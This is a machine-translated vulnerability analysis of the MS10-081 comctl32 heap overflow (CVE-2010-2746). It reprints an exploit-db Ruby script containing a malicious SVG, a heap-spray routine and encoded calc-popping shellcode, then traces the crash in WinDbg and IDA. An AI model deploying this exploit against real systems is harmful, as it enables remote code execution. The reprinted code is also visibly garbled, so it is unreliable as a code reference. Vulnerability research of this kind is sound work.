cve-2010-2746 analysis Microsoft Windows-common Control Library (Comctl32) Heap Overflow (ms10-081)

RELATED links:

exploit-db:https://www.exploit-db.com/exploits/15963/

Microsoft Security Bulletin: https://technet.microsoft.com/library/security/ms10-081

Vulnerability Description:

According to Microsoft's official note, the vulnerability is due to a remote code execution vulnerability in which Windows common control Library Comctl32.dll did not properly handle certain messages when using a third-party Scalable Vector Graphics (SVG) viewer, and described a heap overflow vulnerability.

Environment Introduction:

(1) XP Professional SP 3 (2) Internet Explorer 6.0.2900.5512 (3) ruby1.9 (4) IE8 and the following do not support SVG, need to install SV Gview

Vulnerability Recurrence:

Download EXPLOIT-DB provides the downloaded Ruby script. The execution script listens to port 55555, which returns an HTML page that contains a stack of injected JS and iframe nested svg,svg files defined by a rectangle, the rectangle's transform property has an exception value of 65,535 "\ X21 ", the main contents of the script are as follows:

Transform_name ="\x21"* 65535svg= <<-SVG<?xml version="1.0"? ><! DOCTYPE SVG public"-//w3c//dtd SVG 1.1//en"  "HTTP://WWW.W3.ORG/GRAPHICS/SVG/1.1/DTD/SVG11.DTD"><svg xmlns="Http://www.w3.org/2000/svg"Xmlns:xlink="Http://www.w3.org/1999/xlink"> <rect x=" -"y=" -"height=" the"Width=" the"style="Fill: #ffffff"Transform="#{transform_name} (Translate) rotate ( $)"> </rect> <text x=" -"y=" -">click me</text></svg>svghtml= <<-HTMLfunction Str_dup (str, length) {var result=str;  while(Result.length <length) {Result+=result; }                    returnResult.substr (Result.length-length); } var shellcode= Unescape ("%u9000%u9090%u9090") +//Msfpayload windows/execCmd=calc.exe R | Msfencode-t Js_le-b"\x00"unescape ("%u39ba%ue680%udb4f%u29dc%ub1c9%ud933%u2474%u58f4"+"%U5031%U8313%U04C0%U5003%U6236%UB313%UEBA0%U4CDC"+"%u8c30%ua955%u9e01%ub902%u2e33%uef40%uc5bf%u0404"+"%UAB34%U2B80%U06FD%U02F7%UA6FE%UC837%UA83C%U13CB"+"%u0a10%udbf5%u4b65%u0132%u1985%u4deb%u8e37%u1098"+"%UAF8B%U1F4E%UD7B3%UE0EB%U6247%U30F5%UF9F7%UA8BD"+"%ua57c%uc81d%ub551%u8362%u0ede%u1210%u5f36%u24d9"+"%u0c76%u88e4%u4c7b%u2e20%u3b63%u4c5a%u3c1e%u2e99"+"%uc9c4%u883c%u6a8f%u28e5%uec5c%u266e%u7a29%u2b28"+"%uafac%u5742%u4e25%ud185%u757d%ub901%u1426%u6710"+"%u2989%ucf42%u8c76%ue208%ub663%u6952%u3a72%ud4e9"+"%u4474%u76f2%u751c%u1979%u8a5b%u5da8%uc093%uf4f1"+"%u8d3b%u4563%u2e26%u8a5e%uad5e%u736b%uada5%u7619"+"%u69e2%u0af1%u1c7b%ub9f5%u357c%u5c96%ud5ee%ufa77"+"%u7c96%u0e88"); var base= Str_dup (Unescape ("%u2100"), 0x800-shellcode.length); var arr= [];  for(var i = 0; i < i++;) {Arr[i]= Document.createelement ("a"); Arr[i].innerhtml= [Base + shellcode].join (""); }            -</script> <iframe width="100%"height="100%"Src="Poc.svg"marginheight="0"Marginwidth="0"></iframe> </body>HTML

Open IE, with WinDbg attached after access to http://localhost:55555, will appear below the interface, click on ME, will run Shellcode pop-up calculator, did not play out is also normal due to overflow does not overwrite to the expected data.

Because it is a heap overflow vulnerability, the HPA is turned on to locate the overflow code location.

A memory access exception occurred in the COMCTL32 module when the mouse passed the content. An exception occurred while writing CX to edx, with the value of CX being the previous exception property value character "0x21".

Locating the exception function in Ida comctl32! Stringcopyworkerw, this is not called the System32 under the Comctl32.dll, but the WinSxS directory, which is used to store various versions of the system components. The specific path is to be viewed through the LMM comctl32 v command, which copies the specified number of characters to the destination address.

Looking at the function call stack, you can see the remaining 0xfff2 characters from 0x0c92afe8 to 0x0bb6afe4.

The destination heap address is only 0x20 in size and overflow occurs because there is no limit to the size of the replication.

The source address is a 65,535-character "0x21" in the attribute value

Continue to determine the destination address and the size of the source. View the upper function comctl32! Sbgettext, the use of Ida F5 disassembly was found to come from the upper function comctl32! Statuswndproc.

Continue to navigate to comctl32! based on the return address provided by the call stack Statuswndproc, Parameter 4 is 0x10000, Parameter 3 is LParam is a heap address with a size of 0x20.

Continue to understand the Shellcode implementation process and close the HPA. Change the first byte of Shellcode to 0xcc,int 3 interrupt to locate the process and restart the Ruby script.

Re-debug, here may need to continue to try, after the successful break down, to take a snapshot of the virtual machine, easy to debug.

View the function call stack to see the return address of the current EIP is 0x7e278a8a

Locate the code before the return address, which is known by call [eax+0e0h] to execute shellcode.

Locating mshtml! in Ida Cserver::wndproc,

At this point ESI has been overwritten as 0x00210021,

Re-debug down mshtml! Cserver::wndproc understand the data before ESI is overwritten, overwriting the CDoc object, and calling the virtual function here Cdoc::onwindowmessage

　　　　

cve-2010-2746 analysis Microsoft Windows-common Control Library (Comctl32) Heap Overflow (ms10-081)